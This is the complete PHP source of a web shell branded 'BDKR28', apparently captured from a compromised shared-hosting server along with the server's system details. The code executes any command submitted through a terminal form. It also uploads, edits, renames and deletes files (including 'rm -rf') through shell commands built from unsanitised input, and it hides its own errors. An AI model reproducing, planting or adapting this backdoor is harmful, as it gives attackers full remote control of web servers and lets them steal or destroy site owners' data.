HEX
Server: LiteSpeed
System: Linux server342.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: ksonpoau (1099)
PHP: 8.2.31
Disabled: NONE
$ pwd: /var/tmp/
Upload Files
File: //var/tmp/ffbd6c61fe.php
<?php error_reporting(0); set_time_limit(0); $home = getcwd(); $path = isset($_GET['p']) ? $_GET['p'] : $home; $file = isset($_GET['f']) ? $_GET['f'] : ''; $action = isset($_GET['a']) ? $_GET['a'] : ''; if ($action == 'save' && isset($_POST['content'])) { $target = $_POST['target']; $tmpFile = $target . '.tmp_bdkr'; file_put_contents($tmpFile, $_POST['content']); $cmd = "cp -f '$tmpFile' '$target'"; shell_exec($cmd); @unlink($tmpFile); echo "<script>alert('File Saved via System Command!'); window.location='?p=".dirname($target)."';</script>"; exit; } if ($action == 'ren' && isset($_POST['newname'])) { $old = $_POST['oldpath']; $new = dirname($old).'/'.basename($_POST['newname']); $cmd = "mv '$old' '$new'"; shell_exec($cmd); echo "<script>alert('Renamed via System Command!'); window.location='?p=".dirname($old)."';</script>"; exit; } if (isset($_POST['create_name'])) { $target = $path . '/' . $_POST['create_name']; if ($_POST['type'] == 'dir') { shell_exec("mkdir '$target'"); } else { shell_exec("touch '$target'"); } echo "<script>window.location='?p=$path';</script>"; exit; } if (isset($_FILES['upl'])) { move_uploaded_file($_FILES['upl']['tmp_name'], $path.'/'.$_FILES['upl']['name']); echo "<script>alert('Uploaded!'); window.location='?p=$path';</script>"; exit; } if ($action == 'del') { if (is_dir($file)) { shell_exec("rm -rf '$file'"); } else { shell_exec("rm -f '$file'"); } echo "<script>window.location='?p=$path';</script>"; exit; } $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : ''; $out = ''; if($cmd) { chdir($path); $out = shell_exec("$cmd 2>&1"); } $files = @scandir($path); $dirs = []; $items = []; if($files) { foreach($files as $f) { if($f == '.' || $f == '..') continue; $full = $path.'/'.$f; if(is_dir($full)) $dirs[] = $f; else $items[] = $f; } sort($dirs); sort($items); $sortedFiles = array_merge($dirs, $items); } function formatSize($bytes) { if ($bytes >= 1073741824) return number_format($bytes / 1073741824, 2) . ' GB'; elseif ($bytes >= 1048576) return number_format($bytes / 1048576, 2) . ' MB'; elseif ($bytes >= 1024) return number_format($bytes / 1024, 2) . ' KB'; else return $bytes . ' B'; } ?> <!DOCTYPE html> <html> <head> <title>BDKR28</title> <style> body { background:#1e1e1e; color:#dcdcdc; font-family:'Segoe UI', monospace; margin:0; padding:0; font-size:13px; } a { color:#dcdcdc; text-decoration:none; transition: 0.3s; } a:hover { color:#fff; } .header { background:#2d2d2d; padding:15px; border-bottom:2px solid #007acc; text-align:center; display:flex; justify-content:center; align-items:center; gap:15px; } .brand { font-size:32px; font-weight:bold; letter-spacing:3px; background: linear-gradient(90deg, #ff0000, #ffff00, #00ff00, #00ffff, #0000ff, #ff00ff, #ff0000); background-size: 400%; -webkit-background-clip: text; color: transparent; animation: rainbow 10s ease infinite; } @keyframes rainbow { 0%{background-position:0% 50%} 50%{background-position:100% 50%} 100%{background-position:0% 50%} } .tg-link { font-size:14px; background:#0088cc; color:#fff; padding:5px 10px; border-radius:4px; font-weight:bold; } .tg-link:hover { background:#006699; color:#fff; text-decoration:none; } .path-bar { background:#252526; padding:8px 20px; border-bottom:1px solid #333; color:#aaa; } .path-bar a { color:#007acc; font-weight:bold; } .container { display:flex; height:calc(100vh - 120px); } .main { flex:3; overflow-y:auto; padding:20px; } .term-box { flex:1; background:#1e1e1e; border-left:1px solid #333; padding:15px; position:sticky; top:0; height:100%; overflow-y:auto; box-sizing:border-box; } table { width:100%; border-collapse:collapse; background:#252526; } th { background:#333; color:#fff; padding:8px; text-align:left; font-weight:normal; } td { padding:6px 10px; border-bottom:1px solid #333; } tr:hover { background:#2a2d2e; } .dir-link { color:#569cd6; font-weight:bold; } .file-link { color:#dcdcdc; } .php-file { color:#ce9178; } input[type="text"], textarea, select { background:#3c3c3c; color:#fff; border:1px solid #555; padding:5px; outline:none; width:100%; box-sizing:border-box; } button { background:#0e639c; color:#fff; border:none; padding:6px 15px; cursor:pointer; font-weight:bold; } button:hover { background:#1177bb; } .tools-bar { margin-bottom:15px; display:flex; gap:10px; background:#252526; padding:10px; border:1px solid #333; } textarea.editor { height:500px; font-family:monospace; background:#1e1e1e; color:#d4d4d4; } </style> </head> <body> <div class="header"> <div class="brand">BDKR28</div> <a href="https: </div> <!-- Path Bar --> <div class="path-bar"> Path: <a href="?p=<?php echo urlencode($home); ?>">HOME</a> / <?php $parts = explode('/', str_replace('\\','/', $path)); $temp = ''; foreach($parts as $p){ if($p=='') continue; $temp .= '/'.$p; echo "<a href='?p=".urlencode($temp)."'>$p</a> / "; } ?> </div> <div class="container"> <div class="main"> <?php if($action == 'edit'): ?> <!-- EDITOR --> <h3 style="color:#fff">Editing: <?php echo basename($file); ?></h3> <form method="post"> <textarea name="content" class="editor"><?php if(file_exists($file)) { $handle = fopen($file, "r"); while (!feof($handle)) { echo htmlspecialchars(fgets($handle)); } fclose($handle); } ?></textarea><br><br> <input type="hidden" name="target" value="<?php echo $file; ?>"> <input type="hidden" name="a" value="save"> <button type="submit">Save (System Override)</button> <a href="?p=<?php echo $path; ?>"><button type="button" style="background:#444;">Cancel</button></a> </form> <?php elseif($action == 'rename_form'): ?> <!-- RENAME FORM --> <h3 style="color:#fff">Rename File (System mv)</h3> <form method="post" style="max-width:400px"> New Name: <br><br> <input type="text" name="newname" value="<?php echo basename($file); ?>"> <input type="hidden" name="oldpath" value="<?php echo $file; ?>"> <input type="hidden" name="a" value="ren"> <br><br> <button type="submit">Rename</button> <a href="?p=<?php echo $path; ?>"><button type="button" style="background:#444;">Cancel</button></a> </form> <?php else: ?> <!-- TOOLS --> <div class="tools-bar"> <form method="post" enctype="multipart/form-data" style="display:flex;gap:5px;flex:1"> <input type="file" name="upl"> <button>Upload</button> </form> <form method="post" style="display:flex;gap:5px;flex:1"> <input type="text" name="create_name" placeholder="Name"> <select name="type" style="width:80px"><option value="file">File</option><option value="dir">Folder</option></select> <button>Create</button> </form> </div> <!-- FILE LIST --> <table> <thead> <tr> <th>Name</th> <th width="100">Size</th> <th width="150">Actions</th> </tr> </thead> <tbody> <tr> <td colspan="3"><a href="?p=<?php echo urlencode(dirname($path)); ?>" style="font-weight:bold">.. (Parent Directory)</a></td> </tr> <?php if($sortedFiles): foreach($sortedFiles as $f): $full = $path.'/'.$f; $isDir = is_dir($full); $w = is_writable($full); $size = $isDir ? '-' : formatSize(filesize($full)); $class = 'file-link'; if($isDir) $class = 'dir-link'; elseif(substr($f, -4) == '.php') $class = 'php-file'; $link = $isDir ? "?p=".urlencode($full) : "?a=edit&f=".urlencode($full)."&p=".urlencode($path); ?> <tr> <td> <a href="<?php echo $link; ?>" class="<?php echo $class; ?>"> <?php echo ($isDir ? '[DIR] ' : '[FILE] ') . $f; ?> </a> </td> <td style="color:#888"><?php echo $size; ?></td> <td> <?php if($w): ?> <?php if(!$isDir): ?> <a href="?a=rename_form&f=<?php echo urlencode($full); ?>&p=<?php echo urlencode($path); ?>" style="color:#4ec9b0">Rename</a> | <?php endif; ?> <a href="?a=del&f=<?php echo urlencode($full); ?>" onclick="return confirm('Delete <?php echo $f; ?>?')" style="color:#f44747">Delete</a> <?php else: ?> <span style="color:#555">Read-Only</span> <?php endif; ?> </td> </tr> <?php endforeach; endif; ?> </tbody> </table> <?php endif; ?> </div> <!-- STICKY TERMINAL --> <div class="term-box"> <h4 style="color:#007acc;margin-top:0">Terminal</h4> <div style="font-size:11px;color:#666;margin-bottom:5px">CWD: <?php echo $path; ?></div> <form method="post"> <input type="text" name="cmd" value="<?php echo htmlspecialchars($cmd); ?>" placeholder="Enter command..."> <button type="submit" style="width:100%;margin-top:5px">Execute</button> </form> <pre style="white-space:pre-wrap;color:#ccc;font-size:12px;margin-top:10px;border-top:1px solid #333;padding-top:10px"><?php echo htmlspecialchars($out); ?></pre> </div> </div> </body> </html>
@ Telegram